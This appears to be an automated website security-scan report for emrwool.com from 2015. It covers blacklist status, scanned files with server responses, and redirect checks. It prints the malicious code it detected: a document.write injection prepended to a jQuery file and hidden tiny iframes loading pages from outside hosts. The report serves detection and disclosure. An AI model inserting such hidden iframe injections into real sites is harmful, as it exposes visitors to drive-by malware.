Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=emrwool.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://emrwool.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 14:01:25 GMT Location: tr/ Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | clean |
http://emrwool.com/tr/ | 200 OK Content-Length: 7213 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 94x3 src: http://nmsbaseball.com/post.php?id=836756 <iframe name=twitter scrolling=auto frameborder=no align=center height=3 width=94 src=http://nmsbaseball.com/post.php?id=836756> | ||
http://emrwool.com/tr/../_assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94029 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1512641></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(! Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://appleseedinc.com/aaod.html?j=1512641 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1512641> | ||
http://emrwool.com/../_assets/js/jquery.colorbox.js | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
http://emrwool.com/test404page.js | 404 Not Found Content-Length: 5189 Content-Type: text/html | clean |
http://emrwool.com/../_assets/js/cufon-yui.js | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
http://emrwool.com/../_assets/js/Existence_300.font.js | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
http://emrwool.com/../_assets/js/jquery.nivo.slider.js | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
http://emrwool.com/../_assets/js/main.js | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: emrwool.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 14:01:25 GMT
Location: tr/
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...0 bytes of data.
GET / HTTP/1.1
Host: emrwool.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 14:01:25 GMT
Location: tr/
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: emrwool.com
Referer: http://www.google.com/search?q=emrwool.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: emrwool.com
Referer: http://www.google.com/search?q=emrwool.com
Result:
The result is similar to the first query. There are no suspicious redirects found.